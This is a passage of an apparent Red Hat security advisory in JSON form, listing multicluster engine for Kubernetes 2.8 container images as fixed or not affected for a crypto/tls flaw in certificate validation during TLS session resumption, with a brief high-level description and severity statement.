"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:928850a95a992b3cad76163aa68c17971cd1c4d2eb4cc2aa7495fa43a03c7f9c_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:ad1094291b455efbcb67c99059f25aa0c324a8ea57f1b4917995ca8daefe602d_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:1903cc91969e1e9a9d90676abbaf6a13af2644ab4678c4354cc4c436c7d73320_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:6eaae5bbd36db4137748ce56b9bdb89440d46cf33e44deb7886742151a926233_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:ad396a22c7dfc18d3755b5226322b02cf53e9d889d8c4c0fd9f3fc18640d5229_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:f4e156751bf139839b078a9ed28ac273209573d752850d2191cf523168ecef3c_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:3aa5791c30722dc9a41b11af0e6165b16e1fbb90f9223402f15ccd1b3ab87bcb_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:61aca1200e3f76ad5608ec2fea60192281cfd8dc883ca95a952d4634b362b28d_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:74d46cd69f0ea430d4f64bb7eb2c7801552fd75180bd174afba4280202487a9b_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:d69c9156ba667438e59cb8c71a905fd92a26e830629a5c20223d70173a64a95b_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:79bbb4f57c6b596c4926a8bc3a8fb9f885f05251a6c93a903622ea18ed77f224_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:ac44ed8760e5bf9d701b3cf4296805d1df6f6b9cb57b3e0a7557239de1a542b7_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:b0c796e0d0eea701ebcb55c646042a020d71e18595e260644884596b04dd1def_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:d47167421192458b70433c97afbee742ede2a650c7af0ce54b126fa251cc1ea7_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:1ab0fe650316e0640421fbc361eae235c4a0175c7467acd5e8ad414a8fd1fc75_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:4355c558ed342b1e96f4b23c53b229d22ef4ee48378980eb7359d7864e15fe6d_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:b496e4274643266a37d7ba7134f71e3aa262df65e4c04b9148ee9d7a67da669a_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:ddda8b74fb8cbde98a90fc89c62608dce08a022c0e63ae90a1a0b52123da1c2c_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:36b56d6b9609512532fdae217b892ebc40ce774161e6f90176b052cf7ee686a3_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:575cb613c7cc81507a3e6235e30b0ffbb34f145e2bb6b97632d68ed5e73fd090_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:a8d65fb8b81be9613bc732f696ef245aad46a23335de455d258598dd86c19f8d_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:e9d6ed28fbbe6a3aeb2050c6e8fc3f8a5b6cc7546ee996006e92031294f83d2f_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:4943997b1fed0e8fada897f8296fafd2ec82c69d51f0779b0f1591c9ce2dcc2a_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:7f98a0535715ba9925f93f16c41fc2cfdc16ee8fb32654336f7c5a09b0e7d9dd_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:896deef9b7467a814e9e79a4366da9daf969b2c260ec30a517dfa30887e10205_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:a520297678ce3bd9a01a1e64b41833535d30ba469e55f26c462af1303c0f959d_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:6a25acbc7851fdb9ab19d6f3286e50db85f07064f59a604aedaff48800b06572_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:c02087ae03cff78d4a3fba8887ef55d33cd00a8f2f74806368bf683fa73c0e46_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:c95f5edf4111dc9077d07c0c81df6fc238c6d048d22793f83f7be08bc673b9d3_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:d2cc92420cffc159ce7f27104ba9e49745198e9e3314683209624e4a1a3f041a_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:55928ce9d57439303297ac900fc0b4f95de64ee691a332a21995cf09342c1aff_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:d2949213c7c3f93b0b59082ecdc69f4e05b8038a43afc216926ec43714a73346_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:fb49af7cc738943c59aef8a8b860b00f5e854cc95d58a88461c30ebea0f329c3_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:fff7cebbf5360ae8830e3650f72b5c269be15b9892848f0a3408ed47abb5a5ad_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:4d8f346ef3bffeed12b3c64e5ebed22f8d79397e915c0bfbbc5bf03ee809c0a0_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:913120c0fc826c2f8ed1f2cba5e71c91e2c440e50be043ab912d688b230aa0fb_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:c3633df794c0803b27d8607d1391eb66af8c104712584ba326d04e4cae8627d6_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:d57138c750131113f09ce1259f5702a0d4b984fb29d5d7994c5dc4ad6aaaf39b_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:1766984333b3b3d1d1614bafef596fb94351b3358e04e32d46e20752b60a0d9e_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:17c676d8e456102d877a7feee97c7164ee9f71e21763c5561bed8ac24e5dc2d0_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:9e94ed8885a79d3c7ca3a41ffba43455b410435ea0090fb5c6598eefc5156b22_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:b078e01e6a3d6a04c2e364d42aa4a5be37bb2aa279ae484c524ae58293aacc3a_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:8edafac72bd8526384c33b749595be0986d86957b79ac7ac7ae37b435f27351e_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:9532ce55aa8e3553bd102a891ca6e2b6cf93f23da41c71ba184e769dd1328410_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:9d146a6192bc9251ceb9443e32c708cfbb7cd542f6d9621c1dbbbdff50ede9ae_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:e227cdab2e061d70761d510b0d9c99b4dcf735d0257809c6757155ef18bb341f_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:62fd673d06de31af8b7946b6eb657c69e064dc1e8639197e689375be3a331c90_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:bb9014907e1d57647589efe637bf133e631d03ac94e1c30181eccf6ea8bddc6b_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:d81f2ab37bd8c6e5aaccd0ed2b94fbc2bf88934f3ffda8fde7add64b9f051966_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:dad80c9983167fb8fd98912c890b3a1dbcac2cbadf417c7771a3fda2f23f832c_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:4be015b2648cd7f4edb2aa29521f283959db8336ce4df5497ad8465a031bd3c4_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:758c0f95e9895b61a86e3ff4f4c2570f278c7af13ad3a5876d785829b746bf42_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:9082cef0cbf513a3c33309be5e83774cf92ddae6045c571f43718583da451d8d_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:f1f8475bacfa68df75fa015dfd7fb73565ed2b0b73fe8eeec26c2831862d7175_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:11e40e57f6d48e0eba7e4ed12f4ef55b84ec9f93d2534712318d259dc4fcf4a5_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:132e7098ba9e2ac1e02e04e828359073ecc322a5e9e804badb1e0e5934ff32fe_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:3cdd76fda529eb46161cac023a40b1420d85cfe6ac9100986796e4f49ea5e7c2_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:7805f6d13f8a8a1309c2821622706e0e81c6b0a99f18ca761f031937d67fd484_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:1b8f3645dca1f463be8be4f3bbde53cfb0a28412ddc7f20eed9e39b4f7f02979_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:31b3f532cfa55e76563251f01008c9998b71ba33a4dd75c3307db32173d6ff39_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:5a063e1f8a5d0ff90f7c948f332fff502fc00be8ede14bd0ef4b38ab09717c72_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:5cde57462724bc2ebd303b29d6127d2fdffcd4c4b93ea443eb6ac55290031960_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:45ef14cb6ce30aaf3780fbb5656dae822825b892e165469c0c732e613f452c94_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:9460807bdb775b166264de2b0a5eb348b144cb9a7a0b1d42190a3ce54bea8d63_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:97bb4216555694418e609366ecb47bd1c8336c1e97e76039df4949c5be4fb997_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:b9bc631124b8d4f95faf4de518915fc8bd519edf11055b703ee223c0c4813b52_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:05689e767759be2e46620c752e079847fad0941193456dad22ed33111e69f44c_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:18b0f392942a743b23dc4db9ccccaf467053e70bdad97f1714d0d413f66eaf71_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:32e1fac10eb855484152f41d6a2e4b3fa6fb9c63afd10c5d546db29916f40816_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:c0aeadd784317f5d0a5415bb2002ab6116f2c947c00fc8df9e2a91e907e108bf_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:24c9f0cb19b5e95ee037583eff0c5e683c98d65868f57221e36db1fe1aaad96b_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:4def0b462d24131336a8f641edf6206d9eac005b61d1abd3739b549e74794ee9_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:659a041590140f69a2a0952769a53240e12d770cb7440fc0ac1af4198470e684_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:fd72d5e49c2d10e1ccb16547ee8563ad5c1c4a09960f6c3563b8f394e031c50e_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:2ff4c94a03c71dc68b519db391d0b7f9787e7709df2e5d16aa837fcf522418de_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:b98f70827db37e91dc99336043552d1375cd94a7bbab3c0abcfa7f7d33b3d3d6_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:e7adcd557f69ccf4893c0f40b5ccb19264a401ea98436b5072d1b7593d120bc4_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:eeaf14966d50a750a665ef6304f3ca82b50c0cfe147acf796714ddd0642d51f2_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:126b982ac1e4ca447773a3c9099691f0ad5dca0d7a4101877724421d613c459b_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:548fe802bc62d3ff20ee0b13dcd9792eb304f11d5d496562ad1c2d80b5796c67_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:772e9e4da783b4d33ff1846a6b8fc9ab7acefe76dd21eb3030c83f6352050894_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:d6622aa3381f9ac73e6f3c9764ffe357a434d021c62d20d5a95ebb586b66d87b_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/work-rhel9@sha256:08ffacc73e8bdd40fbd4e913971eb1621a09329c85ec123e1781c08515cf3b5a_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/work-rhel9@sha256:174f055bd042d6ec4e056ef9f6bb430f0b7e68211ee56155aee1d02f6b26a53a_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/work-rhel9@sha256:4248348b507e9a78095ffa9d7a2ef4ff87880f65fdfc8ae71e67018655705c53_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/work-rhel9@sha256:de69889c3af110ae6613401431a384781ece6f82bbe2933b81dedef602be9005_s390x"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2437111"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the crypto/tls component. This vulnerability occurs during Transport Layer Security (TLS) session resumption when certificate authority (CA) settings are modified between the initial and resumed handshakes. An attacker could exploit this to bypass certificate validation, allowing a client or server to establish a connection that should have been rejected. This could lead to an authentication bypass under specific conditions.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "crypto/tls: crypto/tls: Incorrect certificate validation during TLS session resumption",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This is a moderate flaw because it only occurs under specific conditions, such as TLS session resumption with runtime changes to certificate authority settings. Exploitation is not straightforward and requires a controlled setup. The impact is limited to certificate validation within the same component and does not affect system availability.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:4100f29f8a8ba48956cc570cc2a65bc38b9fffa9b946fc3c6253bd0a54f25065_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:850c60717c0c3a8cdc7bb742721e73dbcd8928443fb6776003e3ca71fdd17982_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:c9e8a0a70d60dd717a2f9c8018f1ce963ce25079476a64e8743e826e616ffb00_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:d7dd81c6f47faf4e07602dfed2229b27d8064d8180009b4bc62189030575d421_arm64"
],
"known_not_affected": [
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:8726da36d26d647248ec7d0a38c37760a86b909d5e32535cd79573ba73418e65_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:b0c5ea5c0c5cb1ffb39a18da2d69714adeab262037769c8bb61a08165a9b249d_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:e7d9e3b4d184144fe0048620e63f8605ba70ff6ba6b5f91d911facbe2cc43dc9_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:f6bf8d199b9346b82197c5911b00d4a7a6cb9b7c84d5b0c3d5052aee07e23f53_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:553edf965192cf55bc245e8a3bbf3a27545d62d03d311acc24062a2554a2e85f_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:5d7b59bfe6851def3f341bfad75ef2e6fcea8cc77ea3268167519f8d3bae5c33_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:6abe1731496380fe823109b6acc4415130e65d51722e27da134eb79f0a3f4f18_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:baedd408112b3fbd00b03ff80f5bf1afc390250aa5aa07ed4e83aadc5ea47e4c_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:797e7b8b8dd7e769d8af43c94076e17b0e9dad73121bafd44368b95c0e5b21d2_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:a368438d68a76db54dc21edee2a9dfe0356201730e5edaf3efe2e5d35cf4812b_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:c18392461e4b948a1e269a91750048df39b06512e0c12b35ca2bfcbd7cbfc6bc_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:d4e3c622c9e9e9fd7715efe0675082b313811c3ad4be4d483b0bd6df4137b98d_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:384d7665ebd94ba2c06dc5039f63b2e5d9a7562c2c55dc5018a4605cb72f8159_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:6efea98320dbf13ef6b7bd24cc45b5cddc2f9368b71556770abd846f27b0b989_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:98fade294c1ff0688c36878f62275e82a2b19696c2a01edd5fa78acca4a99104_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:e26c917cc85445632f6e971636a98d5e7a0bbc3c1fd3dc647385c3ab4abf13f0_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:5e4dde4a4e91f67ad09ea3fe2b685731570fbbdab3bed1729f727ed50728f0aa_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:89623857fddc1cb6a4c00f7927adeebe64a9035b104bee39c7c4e5ca73d4161a_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:928850a95a992b3cad76163aa68c17971cd1c4d2eb4cc2aa7495fa43a03c7f9c_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:ad1094291b455efbcb67c99059f25aa0c324a8ea57f1b4917995ca8daefe602d_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:1903cc91969e1e9a9d90676abbaf6a13af2644ab4678c4354cc4c436c7d73320_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:6eaae5bbd36db4137748ce56b9bdb89440d46cf33e44deb7886742151a926233_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:ad396a22c7dfc18d3755b5226322b02cf53e9d889d8c4c0fd9f3fc18640d5229_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:f4e156751bf139839b078a9ed28ac273209573d752850d2191cf523168ecef3c_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:3aa5791c30722dc9a41b11af0e6165b16e1fbb90f9223402f15ccd1b3ab87bcb_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:61aca1200e3f76ad5608ec2fea60192281cfd8dc883ca95a952d4634b362b28d_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:74d46cd69f0ea430d4f64bb7eb2c7801552fd75180bd174afba4280202487a9b_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:d69c9156ba667438e59cb8c71a905fd92a26e830629a5c20223d70173a64a95b_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:79bbb4f57c6b596c4926a8bc3a8fb9f885f05251a6c93a903622ea18ed77f224_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:ac44ed8760e5bf9d701b3cf4296805d1df6f6b9cb57b3e0a7557239de1a542b7_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:b0c796e0d0eea701ebcb55c646042a020d71e18595e260644884596b04dd1def_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:d47167421192458b70433c97afbee742ede2a650c7af0ce54b126fa251cc1ea7_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:1ab0fe650316e0640421fbc361eae235c4a0175c7467acd5e8ad414a8fd1fc75_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:4355c558ed342b1e96f4b23c53b229d22ef4ee48378980eb7359d7864e15fe6d_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:b496e4274643266a37d7ba7134f71e3aa262df65e4c04b9148ee9d7a67da669a_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:ddda8b74fb8cbde98a90fc89c62608dce08a022c0e63ae90a1a0b52123da1c2c_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:36b56d6b9609512532fdae217b892ebc40ce774161e6f90176b052cf7ee686a3_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:575cb613c7cc81507a3e6235e30b0ffbb34f145e2bb6b97632d68ed5e73fd090_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:a8d65fb8b81be9613bc732f696ef245aad46a23335de455d258598dd86c19f8d_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:e9d6ed28fbbe6a3aeb2050c6e8fc3f8a5b6cc7546ee996006e92031294f83d2f_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:4943997b1fed0e8fada897f8296fafd2ec82c69d51f0779b0f1591c9ce2dcc2a_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:7f98a0535715ba9925f93f16c41fc2cfdc16ee8fb32654336f7c5a09b0e7d9dd_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:896deef9b7467a814e9e79a4366da9daf969b2c260ec30a517dfa30887e10205_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:a520297678ce3bd9a01a1e64b41833535d30ba469e55f26c462af1303c0f959d_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:6a25acbc7851fdb9ab19d6f3286e50db85f07064f59a604aedaff48800b06572_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:c02087ae03cff78d4a3fba8887ef55d33cd00a8f2f74806368bf683fa73c0e46_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:c95f5edf4111dc9077d07c0c81df6fc238c6d048d22793f83f7be08bc673b9d3_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:d2cc92420cffc159ce7f27104ba9e49745198e9e3314683209624e4a1a3f041a_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:55928ce9d57439303297ac900fc0b4f95de64ee691a332a21995cf09342c1aff_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:d2949213c7c3f93b0b59082ecdc69f4e05b8038a43afc216926ec43714a73346_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:fb49af7cc738943c59aef8a8b860b00f5e854cc95d58a88461c30ebea0f329c3_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:fff7cebbf5360ae8830e3650f72b5c269be15b9892848f0a3408ed47abb5a5ad_arm64",
